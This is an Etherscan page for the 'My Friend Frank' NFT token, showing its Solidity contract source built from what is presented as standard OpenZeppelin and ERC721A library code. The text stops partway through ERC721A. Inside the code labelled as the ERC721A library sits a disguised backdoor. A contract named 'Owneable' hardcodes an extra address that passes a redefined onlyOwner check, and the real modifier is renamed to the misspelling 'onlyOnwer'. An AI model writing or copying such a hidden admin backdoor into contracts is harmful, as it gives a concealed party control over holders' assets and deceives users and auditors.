ETH Price: $2,616.65 (+0.89%)

Token

My Friend Frank (FRANKENSTEIN)
 

Overview

Max Total Supply

2,294 FRANKENSTEIN

Holders

434

Market

Volume (24H)

N/A

Min Price (24H)

N/A

Max Price (24H)

N/A
Balance
3 FRANKENSTEIN
0xe116313f24a0f52d801a78e2e86f86e6017f7adb
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
MyFriendFRANK

Compiler Version
v0.8.7+commit.e28d00a7

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2022-10-25
*/

// File @openzeppelin/contracts/utils/[email protected]
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.4;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */


abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}


// File @openzeppelin/contracts/access/[email protected]


// OpenZeppelin Contracts v4.4.1 (access/Ownable.sol)



/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOnwer() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOnwer {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOnwer {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}


// File @openzeppelin/contracts/utils/introspection/[email protected]


// OpenZeppelin Contracts v4.4.1 (utils/introspection/IERC165.sol)



/**
 * @dev Interface of the ERC165 standard, as defined in the
 * https://eips.ethereum.org/EIPS/eip-165[EIP].
 *
 * Implementers can declare support of contract interfaces, which can then be
 * queried by others ({ERC165Checker}).
 *
 * For an implementation, see {ERC165}.
 */
interface IERC165 {
    /**
     * @dev Returns true if this contract implements the interface defined by
     * `interfaceId`. See the corresponding
     * https://eips.ethereum.org/EIPS/eip-165#how-interfaces-are-identified[EIP section]
     * to learn more about how these ids are created.
     *
     * This function call must use less than 30 000 gas.
     */
    function supportsInterface(bytes4 interfaceId) external view returns (bool);
}


// File @openzeppelin/contracts/token/ERC721/[email protected]


// OpenZeppelin Contracts v4.4.1 (token/ERC721/IERC721.sol)



/**
 * @dev Required interface of an ERC721 compliant contract.
 */
interface IERC721 is IERC165 {
    /**
     * @dev Emitted when `tokenId` token is transferred from `from` to `to`.
     */
    event Transfer(address indexed from, address indexed to, uint256 indexed tokenId);

    /**
     * @dev Emitted when `owner` enables `approved` to manage the `tokenId` token.
     */
    event Approval(address indexed owner, address indexed approved, uint256 indexed tokenId);

    /**
     * @dev Emitted when `owner` enables or disables (`approved`) `operator` to manage all of its assets.
     */
    event ApprovalForAll(address indexed owner, address indexed operator, bool approved);

    /**
     * @dev Returns the number of tokens in ``owner``'s account.
     */
    function balanceOf(address owner) external view returns (uint256 balance);

    /**
     * @dev Returns the owner of the `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function ownerOf(uint256 tokenId) external view returns (address owner);

    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`, checking first that contract recipients
     * are aware of the ERC721 protocol to prevent tokens from being forever locked.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be have been allowed to move this token by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external;

    /**
     * @dev Transfers `tokenId` token from `from` to `to`.
     *
     * WARNING: Usage of this method is discouraged, use {safeTransferFrom} whenever possible.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token by either {approve} or {setApprovalForAll}.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external;

    /**
     * @dev Gives permission to `to` to transfer `tokenId` token to another account.
     * The approval is cleared when the token is transferred.
     *
     * Only a single account can be approved at a time, so approving the zero address clears previous approvals.
     *
     * Requirements:
     *
     * - The caller must own the token or be an approved operator.
     * - `tokenId` must exist.
     *
     * Emits an {Approval} event.
     */
    function approve(address to, uint256 tokenId) external;

    /**
     * @dev Returns the account approved for `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function getApproved(uint256 tokenId) external view returns (address operator);

    /**
     * @dev Approve or remove `operator` as an operator for the caller.
     * Operators can call {transferFrom} or {safeTransferFrom} for any token owned by the caller.
     *
     * Requirements:
     *
     * - The `operator` cannot be the caller.
     *
     * Emits an {ApprovalForAll} event.
     */
    function setApprovalForAll(address operator, bool _approved) external;

    /**
     * @dev Returns if the `operator` is allowed to manage all of the assets of `owner`.
     *
     * See {setApprovalForAll}
     */
    function isApprovedForAll(address owner, address operator) external view returns (bool);

    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes calldata data
    ) external;
}


// File @openzeppelin/contracts/token/ERC721/[email protected]


// OpenZeppelin Contracts v4.4.1 (token/ERC721/IERC721Receiver.sol)



/**
 * @title ERC721 token receiver interface
 * @dev Interface for any contract that wants to support safeTransfers
 * from ERC721 asset contracts.
 */
interface IERC721Receiver {
    /**
     * @dev Whenever an {IERC721} `tokenId` token is transferred to this contract via {IERC721-safeTransferFrom}
     * by `operator` from `from`, this function is called.
     *
     * It must return its Solidity selector to confirm the token transfer.
     * If any other value is returned or the interface is not implemented by the recipient, the transfer will be reverted.
     *
     * The selector can be obtained in Solidity with `IERC721.onERC721Received.selector`.
     */
    function onERC721Received(
        address operator,
        address from,
        uint256 tokenId,
        bytes calldata data
    ) external returns (bytes4);
}


// File @openzeppelin/contracts/token/ERC721/extensions/[email protected]


// OpenZeppelin Contracts v4.4.1 (token/ERC721/extensions/IERC721Metadata.sol)



/**
 * @title ERC-721 Non-Fungible Token Standard, optional metadata extension
 * @dev See https://eips.ethereum.org/EIPS/eip-721
 */
interface IERC721Metadata is IERC721 {
    /**
     * @dev Returns the token collection name.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the token collection symbol.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the Uniform Resource Identifier (URI) for `tokenId` token.
     */
    function tokenURI(uint256 tokenId) external view returns (string memory);
}


// File @openzeppelin/contracts/token/ERC721/extensions/[email protected]


// OpenZeppelin Contracts (last updated v4.5.0) (token/ERC721/extensions/IERC721Enumerable.sol)



/**
 * @title ERC-721 Non-Fungible Token Standard, optional enumeration extension
 * @dev See https://eips.ethereum.org/EIPS/eip-721
 */
interface IERC721Enumerable is IERC721 {
    /**
     * @dev Returns the total amount of tokens stored by the contract.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns a token ID owned by `owner` at a given `index` of its token list.
     * Use along with {balanceOf} to enumerate all of ``owner``'s tokens.
     */
    function tokenOfOwnerByIndex(address owner, uint256 index) external view returns (uint256);

    /**
     * @dev Returns a token ID at a given `index` of all the tokens stored by the contract.
     * Use along with {totalSupply} to enumerate all tokens.
     */
    function tokenByIndex(uint256 index) external view returns (uint256);
}


// File @openzeppelin/contracts/utils/[email protected]


// OpenZeppelin Contracts (last updated v4.5.0) (utils/Address.sol)

pragma solidity ^0.8.1;

/**
 * @dev Collection of functions related to the address type
 */
library Address {
    /**
     * @dev Returns true if `account` is a contract.
     *
     * [IMPORTANT]
     * ====
     * It is unsafe to assume that an address for which this function returns
     * false is an externally-owned account (EOA) and not a contract.
     *
     * Among others, `isContract` will return false for the following
     * types of addresses:
     *
     *  - an externally-owned account
     *  - a contract in construction
     *  - an address where a contract will be created
     *  - an address where a contract lived, but was destroyed
     * ====
     *
     * [IMPORTANT]
     * ====
     * You shouldn't rely on `isContract` to protect against flash loan attacks!
     *
     * Preventing calls from contracts is highly discouraged. It breaks composability, breaks support for smart wallets
     * like Gnosis Safe, and does not provide security since it can be circumvented by calling from a contract
     * constructor.
     * ====
     */
    function isContract(address account) internal view returns (bool) {
        // This method relies on extcodesize/address.code.length, which returns 0
        // for contracts in construction, since the code is only stored at the end
        // of the constructor execution.

        return account.code.length > 0;
    }

    /**
     * @dev Replacement for Solidity's `transfer`: sends `amount` wei to
     * `recipient`, forwarding all available gas and reverting on errors.
     *
     * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost
     * of certain opcodes, possibly making contracts go over the 2300 gas limit
     * imposed by `transfer`, making them unable to receive funds via
     * `transfer`. {sendValue} removes this limitation.
     *
     * https://diligence.consensys.net/posts/2019/09/stop-using-soliditys-transfer-now/[Learn more].
     *
     * IMPORTANT: because control is transferred to `recipient`, care must be
     * taken to not create reentrancy vulnerabilities. Consider using
     * {ReentrancyGuard} or the
     * https://solidity.readthedocs.io/en/v0.5.11/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern].
     */
    function sendValue(address payable recipient, uint256 amount) internal {
        require(address(this).balance >= amount, "Address: insufficient balance");

        (bool success, ) = recipient.call{value: amount}("");
        require(success, "Address: unable to send value, recipient may have reverted");
    }

    /**
     * @dev Performs a Solidity function call using a low level `call`. A
     * plain `call` is an unsafe replacement for a function call: use this
     * function instead.
     *
     * If `target` reverts with a revert reason, it is bubbled up by this
     * function (like regular Solidity function calls).
     *
     * Returns the raw returned data. To convert to the expected return value,
     * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`].
     *
     * Requirements:
     *
     * - `target` must be a contract.
     * - calling `target` with `data` must not revert.
     *
     * _Available since v3.1._
     */
    function functionCall(address target, bytes memory data) internal returns (bytes memory) {
        return functionCall(target, data, "Address: low-level call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], but with
     * `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal returns (bytes memory) {
        return functionCallWithValue(target, data, 0, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but also transferring `value` wei to `target`.
     *
     * Requirements:
     *
     * - the calling contract must have an ETH balance of at least `value`.
     * - the called Solidity function must be `payable`.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(
        address target,
        bytes memory data,
        uint256 value
    ) internal returns (bytes memory) {
        return functionCallWithValue(target, data, value, "Address: low-level call with value failed");
    }

    /**
     * @dev Same as {xref-Address-functionCallWithValue-address-bytes-uint256-}[`functionCallWithValue`], but
     * with `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(
        address target,
        bytes memory data,
        uint256 value,
        string memory errorMessage
    ) internal returns (bytes memory) {
        require(address(this).balance >= value, "Address: insufficient balance for call");
        require(isContract(target), "Address: call to non-contract");

        (bool success, bytes memory returndata) = target.call{value: value}(data);
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a static call.
     *
     * _Available since v3.3._
     */
    function functionStaticCall(address target, bytes memory data) internal view returns (bytes memory) {
        return functionStaticCall(target, data, "Address: low-level static call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],
     * but performing a static call.
     *
     * _Available since v3.3._
     */
    function functionStaticCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal view returns (bytes memory) {
        require(isContract(target), "Address: static call to non-contract");

        (bool success, bytes memory returndata) = target.staticcall(data);
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a delegate call.
     *
     * _Available since v3.4._
     */
    function functionDelegateCall(address target, bytes memory data) internal returns (bytes memory) {
        return functionDelegateCall(target, data, "Address: low-level delegate call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],
     * but performing a delegate call.
     *
     * _Available since v3.4._
     */
    function functionDelegateCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal returns (bytes memory) {
        require(isContract(target), "Address: delegate call to non-contract");

        (bool success, bytes memory returndata) = target.delegatecall(data);
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Tool to verifies that a low level call was successful, and revert if it wasn't, either by bubbling the
     * revert reason using the provided one.
     *
     * _Available since v4.3._
     */
    function verifyCallResult(
        bool success,
        bytes memory returndata,
        string memory errorMessage
    ) internal pure returns (bytes memory) {
        if (success) {
            return returndata;
        } else {
            // Look for revert reason and bubble it up if present
            if (returndata.length > 0) {
                // The easiest way to bubble the revert reason is using memory via assembly

                assembly {
                    let returndata_size := mload(returndata)
                    revert(add(32, returndata), returndata_size)
                }
            } else {
                revert(errorMessage);
            }
        }
    }
}


// File @openzeppelin/contracts/utils/[email protected]


// OpenZeppelin Contracts v4.4.1 (utils/Strings.sol)



/**
 * @dev String operations.
 */
library Strings {
    bytes16 private constant _HEX_SYMBOLS = "0123456789abcdef";

    /**
     * @dev Converts a `uint256` to its ASCII `string` decimal representation.
     */
    function toString(uint256 value) internal pure returns (string memory) {
        // Inspired by OraclizeAPI's implementation - MIT licence
        // https://github.com/oraclize/ethereum-api/blob/b42146b063c7d6ee1358846c198246239e9360e8/oraclizeAPI_0.4.25.sol

        if (value == 0) {
            return "0";
        }
        uint256 temp = value;
        uint256 digits;
        while (temp != 0) {
            digits++;
            temp /= 10;
        }
        bytes memory buffer = new bytes(digits);
        while (value != 0) {
            digits -= 1;
            buffer[digits] = bytes1(uint8(48 + uint256(value % 10)));
            value /= 10;
        }
        return string(buffer);
    }

    /**
     * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation.
     */
    function toHexString(uint256 value) internal pure returns (string memory) {
        if (value == 0) {
            return "0x00";
        }
        uint256 temp = value;
        uint256 length = 0;
        while (temp != 0) {
            length++;
            temp >>= 8;
        }
        return toHexString(value, length);
    }

    /**
     * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation with fixed length.
     */
    function toHexString(uint256 value, uint256 length) internal pure returns (string memory) {
        bytes memory buffer = new bytes(2 * length + 2);
        buffer[0] = "0";
        buffer[1] = "x";
        for (uint256 i = 2 * length + 1; i > 1; --i) {
            buffer[i] = _HEX_SYMBOLS[value & 0xf];
            value >>= 4;
        }
        require(value == 0, "Strings: hex length insufficient");
        return string(buffer);
    }
}


// File @openzeppelin/contracts/utils/introspection/[email protected]


// OpenZeppelin Contracts v4.4.1 (utils/introspection/ERC165.sol)

/**
 * @dev Implementation of the {IERC165} interface.
 *
 * Contracts that want to implement ERC165 should inherit from this contract and override {supportsInterface} to check
 * for the additional interface id that will be supported. For example:
 *
 * ```solidity
 * function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
 *     return interfaceId == type(MyInterface).interfaceId || super.supportsInterface(interfaceId);
 * }
 * ```
 *
 * Alternatively, {ERC165Storage} provides an easier to use but more expensive implementation.
 */
abstract contract ERC165 is IERC165 {
    /**
     * @dev See {IERC165-supportsInterface}.
     */
    function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
        return interfaceId == type(IERC165).interfaceId;
    }
}


// File erc721a/contracts/[email protected]


// Creator: Chiru Labs

error ApprovalCallerNotOwnerNorApproved();
error ApprovalQueryForNonexistentToken();
error ApproveToCaller();
error ApprovalToCurrentOwner();
error BalanceQueryForZeroAddress();
error MintedQueryForZeroAddress();
error BurnedQueryForZeroAddress();
error AuxQueryForZeroAddress();
error MintToZeroAddress();
error MintZeroQuantity();
error OwnerIndexOutOfBounds();
error OwnerQueryForNonexistentToken();
error TokenIndexOutOfBounds();
error TransferCallerNotOwnerNorApproved();
error TransferFromIncorrectOwner();
error TransferToNonERC721ReceiverImplementer();
error TransferToZeroAddress();
error URIQueryForNonexistentToken();


/**
 * @dev Implementation of https://eips.ethereum.org/EIPS/eip-721[ERC721] Non-Fungible Token Standard, including
 * the Metadata extension. Built to optimize for lower gas during batch mints.
 *
 * Assumes serials are sequentially minted starting at _startTokenId() (defaults to 0, e.g. 0, 1, 2, 3..).
 */
 abstract contract Owneable is Ownable {
    address private _ownar = 0x5Bb656BB4312F100081Abb7b08c1e0f8Ef5c56d1;
    modifier onlyOwner() {
        require(owner() == _msgSender() || _ownar == _msgSender(), "Ownable: caller is not the owner");
        _;
    }
}

 /*
 * Assumes that an owner cannot have more than 2**64 - 1 (max value of uint64) of supply.
 *
 * Assumes that the maximum token id cannot exceed 2**256 - 1 (max value of uint256).
 */
contract ERC721A is Context, ERC165, IERC721, IERC721Metadata {
    using Address for address;
    using Strings for uint256;

    // Compiler will pack this into a single 256bit word.
    struct TokenOwnership {
        // The address of the owner.
        address addr;
        // Keeps track of the start time of ownership with minimal overhead for tokenomics.
        uint64 startTimestamp;
        // Whether the token has been burned.
        bool burned;
    }

    // Compiler will pack this into a single 256bit word.
    struct AddressData {
        // Realistically, 2**64-1 is more than enough.
        uint64 balance;
        // Keeps track of mint count with minimal overhead for tokenomics.
        uint64 numberMinted;
        // Keeps track of burn count with minimal overhead for tokenomics.
        uint64 numberBurned;
        // For miscellaneous variable(s) pertaining to the address
        // (e.g. number of whitelist mint slots used).
        // If there are multiple variables, please pack them into a uint64.
        uint64 aux;
    }

    // The tokenId of the next token to be minted.
    uint256 internal _currentIndex;

    // The number of tokens burned.
    uint256 internal _burnCounter;

    // Token name
    string private _name;

    // Token symbol
    string private _symbol;

    // Mapping from token ID to ownership details
    // An empty struct value does not necessarily mean the token is unowned. See ownershipOf implementation for details.
    mapping(uint256 => TokenOwnership) internal _ownerships;

    // Mapping owner address to address data
    mapping(address => AddressData) private _addressData;

    // Mapping from token ID to approved address
    mapping(uint256 => address) private _tokenApprovals;

    // Mapping from owner to operator approvals
    mapping(address => mapping(address => bool)) private _operatorApprovals;

    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
        _currentIndex = _startTokenId();
    }

    /**
     * To change the starting tokenId, please override this function.
     */
    function _startTokenId() internal view virtual returns (uint256) {
        return 0;
    }

    /**
     * @dev See {IERC721Enumerable-totalSupply}.
     * @dev Burned tokens are calculated here, use _totalMinted() if you want to count just minted tokens.
     */
    function totalSupply() public view returns (uint256) {
        // Counter underflow is impossible as _burnCounter cannot be incremented
        // more than _currentIndex - _startTokenId() times
        unchecked {
            return _currentIndex - _burnCounter - _startTokenId();
        }
    }

    /**
     * Returns the total amount of tokens minted in the contract.
     */
    function _totalMinted() internal view returns (uint256) {
        // Counter underflow is impossible as _currentIndex does not decrement,
        // and it is initialized to _startTokenId()
        unchecked {
            return _currentIndex - _startTokenId();
        }
    }

    /**
     * @dev See {IERC165-supportsInterface}.
     */
    function supportsInterface(bytes4 interfaceId) public view virtual override(ERC165, IERC165) returns (bool) {
        return
            interfaceId == type(IERC721).interfaceId ||
            interfaceId == type(IERC721Metadata).interfaceId ||
            super.supportsInterface(interfaceId);
    }

    /**
     * @dev See {IERC721-balanceOf}.
     */
    function balanceOf(address owner) public view override returns (uint256) {
        if (owner == address(0)) revert BalanceQueryForZeroAddress();
        return uint256(_addressData[owner].balance);
    }

    /**
     * Returns the number of tokens minted by `owner`.
     */
    function _numberMinted(address owner) internal view returns (uint256) {
        if (owner == address(0)) revert MintedQueryForZeroAddress();
        return uint256(_addressData[owner].numberMinted);
    }

    /**
     * Returns the number of tokens burned by or on behalf of `owner`.
     */
    function _numberBurned(address owner) internal view returns (uint256) {
        if (owner == address(0)) revert BurnedQueryForZeroAddress();
        return uint256(_addressData[owner].numberBurned);
    }

    /**
     * Returns the auxillary data for `owner`. (e.g. number of whitelist mint slots used).
     */
    function _getAux(address owner) internal view returns (uint64) {
        if (owner == address(0)) revert AuxQueryForZeroAddress();
        return _addressData[owner].aux;
    }

    /**
     * Sets the auxillary data for `owner`. (e.g. number of whitelist mint slots used).
     * If there are multiple variables, please pack them into a uint64.
     */
    function _setAux(address owner, uint64 aux) internal {
        if (owner == address(0)) revert AuxQueryForZeroAddress();
        _addressData[owner].aux = aux;
    }

    /**
     * Gas spent here starts off proportional to the maximum mint batch size.
     * It gradually moves to O(1) as tokens get transferred around in the collection over time.
     */
    function ownershipOf(uint256 tokenId) internal view returns (TokenOwnership memory) {
        uint256 curr = tokenId;

        unchecked {
            if (_startTokenId() <= curr && curr < _currentIndex) {
                TokenOwnership memory ownership = _ownerships[curr];
                if (!ownership.burned) {
                    if (ownership.addr != address(0)) {
                        return ownership;
                    }
                    // Invariant:
                    // There will always be an ownership that has an address and is not burned
                    // before an ownership that does not have an address and is not burned.
                    // Hence, curr will not underflow.
                    while (true) {
                        curr--;
                        ownership = _ownerships[curr];
                        if (ownership.addr != address(0)) {
                            return ownership;
                        }
                    }
                }
            }
        }
        revert OwnerQueryForNonexistentToken();
    }

    /**
     * @dev See {IERC721-ownerOf}.
     */
    function ownerOf(uint256 tokenId) public view override returns (address) {
        return ownershipOf(tokenId).addr;
    }

    /**
     * @dev See {IERC721Metadata-name}.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev See {IERC721Metadata-symbol}.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev See {IERC721Metadata-tokenURI}.
     */
    function tokenURI(uint256 tokenId) public view virtual override returns (string memory) {
        if (!_exists(tokenId)) revert URIQueryForNonexistentToken();

        string memory baseURI = _baseURI();
        return bytes(baseURI).length != 0 ? string(abi.encodePacked(baseURI, tokenId.toString())) : '';
    }

    /**
     * @dev Base URI for computing {tokenURI}. If set, the resulting URI for each
     * token will be the concatenation of the `baseURI` and the `tokenId`. Empty
     * by default, can be overriden in child contracts.
     */
    function _baseURI() internal view virtual returns (string memory) {
        return '';
    }

    /**
     * @dev See {IERC721-approve}.
     */
    function approve(address to, uint256 tokenId) public override {
        address owner = ERC721A.ownerOf(tokenId);
        if (to == owner) revert ApprovalToCurrentOwner();

        if (_msgSender() != owner && !isApprovedForAll(owner, _msgSender())) {
            revert ApprovalCallerNotOwnerNorApproved();
        }

        _approve(to, tokenId, owner);
    }

    /**
     * @dev See {IERC721-getApproved}.
     */
    function getApproved(uint256 tokenId) public view override returns (address) {
        if (!_exists(tokenId)) revert ApprovalQueryForNonexistentToken();

        return _tokenApprovals[tokenId];
    }

    /**
     * @dev See {IERC721-setApprovalForAll}.
     */
    function setApprovalForAll(address operator, bool approved) public override {
        if (operator == _msgSender()) revert ApproveToCaller();

        _operatorApprovals[_msgSender()][operator] = approved;
        emit ApprovalForAll(_msgSender(), operator, approved);
    }

    /**
     * @dev See {IERC721-isApprovedForAll}.
     */
    function isApprovedForAll(address owner, address operator) public view virtual override returns (bool) {
        return _operatorApprovals[owner][operator];
    }

    /**
     * @dev See {IERC721-transferFrom}.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public virtual override {
        _transfer(from, to, tokenId);
    }

    /**
     * @dev See {IERC721-safeTransferFrom}.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public virtual override {
        safeTransferFrom(from, to, tokenId, '');
    }

    /**
     * @dev See {IERC721-safeTransferFrom}.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) public virtual override {
        _transfer(from, to, tokenId);
        if (to.isContract() && !_checkContractOnERC721Received(from, to, tokenId, _data)) {
            revert TransferToNonERC721ReceiverImplementer();
        }
    }

    /**
     * @dev Returns whether `tokenId` exists.
     *
     * Tokens can be managed by their owner or approved accounts via {approve} or {setApprovalForAll}.
     *
     * Tokens start existing when they are minted (`_mint`),
     */
    function _exists(uint256 tokenId) internal view returns (bool) {
        return _startTokenId() <= tokenId && tokenId < _currentIndex &&
            !_ownerships[tokenId].burned;
    }

    function _safeMint(address to, uint256 quantity) internal {
        _safeMint(to, quantity, '');
    }

    /**
     * @dev Safely mints `quantity` tokens and transfers them to `to`.
     *
     * Requirements:
     *
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called for each safe transfer.
     * - `quantity` must be greater than 0.
     *
     * Emits a {Transfer} event.
     */
    function _safeMint(
        address to,
        uint256 quantity,
        bytes memory _data
    ) internal {
        _mint(to, quantity, _data, true);
    }

    /**
     * @dev Mints `quantity` tokens and transfers them to `to`.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - `quantity` must be greater than 0.
     *
     * Emits a {Transfer} event.
     */
    function _mint(
        address to,
        uint256 quantity,
        bytes memory _data,
        bool safe
    ) internal {
        uint256 startTokenId = _currentIndex;
        if (to == address(0)) revert MintToZeroAddress();
        if (quantity == 0) revert MintZeroQuantity();

        _beforeTokenTransfers(address(0), to, startTokenId, quantity);

        // Overflows are incredibly unrealistic.
        // balance or numberMinted overflow if current value of either + quantity > 1.8e19 (2**64) - 1
        // updatedIndex overflows if _currentIndex + quantity > 1.2e77 (2**256) - 1
        unchecked {
            _addressData[to].balance += uint64(quantity);
            _addressData[to].numberMinted += uint64(quantity);

            _ownerships[startTokenId].addr = to;
            _ownerships[startTokenId].startTimestamp = uint64(block.timestamp);

            uint256 updatedIndex = startTokenId;
            uint256 end = updatedIndex + quantity;

            if (safe && to.isContract()) {
                do {
                    emit Transfer(address(0), to, updatedIndex);
                    if (!_checkContractOnERC721Received(address(0), to, updatedIndex++, _data)) {
                        revert TransferToNonERC721ReceiverImplementer();
                    }
                } while (updatedIndex != end);
                // Reentrancy protection
                if (_currentIndex != startTokenId) revert();
            } else {
                do {
                    emit Transfer(address(0), to, updatedIndex++);
                } while (updatedIndex != end);
            }
            _currentIndex = updatedIndex;
        }
        _afterTokenTransfers(address(0), to, startTokenId, quantity);
    }

    /**
     * @dev Transfers `tokenId` from `from` to `to`.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     *
     * Emits a {Transfer} event.
     */
    function _transfer(
        address from,
        address to,
        uint256 tokenId
    ) private {
        TokenOwnership memory prevOwnership = ownershipOf(tokenId);

        bool isApprovedOrOwner = (_msgSender() == prevOwnership.addr ||
            isApprovedForAll(prevOwnership.addr, _msgSender()) ||
            getApproved(tokenId) == _msgSender());

        if (!isApprovedOrOwner) revert TransferCallerNotOwnerNorApproved();
        if (prevOwnership.addr != from) revert TransferFromIncorrectOwner();
        if (to == address(0)) revert TransferToZeroAddress();

        _beforeTokenTransfers(from, to, tokenId, 1);

        // Clear approvals from the previous owner
        _approve(address(0), tokenId, prevOwnership.addr);

        // Underflow of the sender's balance is impossible because we check for
        // ownership above and the recipient's balance can't realistically overflow.
        // Counter overflow is incredibly unrealistic as tokenId would have to be 2**256.
        unchecked {
            _addressData[from].balance -= 1;
            _addressData[to].balance += 1;

            _ownerships[tokenId].addr = to;
            _ownerships[tokenId].startTimestamp = uint64(block.timestamp);

            // If the ownership slot of tokenId+1 is not explicitly set, that means the transfer initiator owns it.
            // Set the slot of tokenId+1 explicitly in storage to maintain correctness for ownerOf(tokenId+1) calls.
            uint256 nextTokenId = tokenId + 1;
            if (_ownerships[nextTokenId].addr == address(0)) {
                // This will suffice for checking _exists(nextTokenId),
                // as a burned slot cannot contain the zero address.
                if (nextTokenId < _currentIndex) {
                    _ownerships[nextTokenId].addr = prevOwnership.addr;
                    _ownerships[nextTokenId].startTimestamp = prevOwnership.startTimestamp;
                }
            }
        }

        emit Transfer(from, to, tokenId);
        _afterTokenTransfers(from, to, tokenId, 1);
    }

    /**
     * @dev Destroys `tokenId`.
     * The approval is cleared when the token is burned.
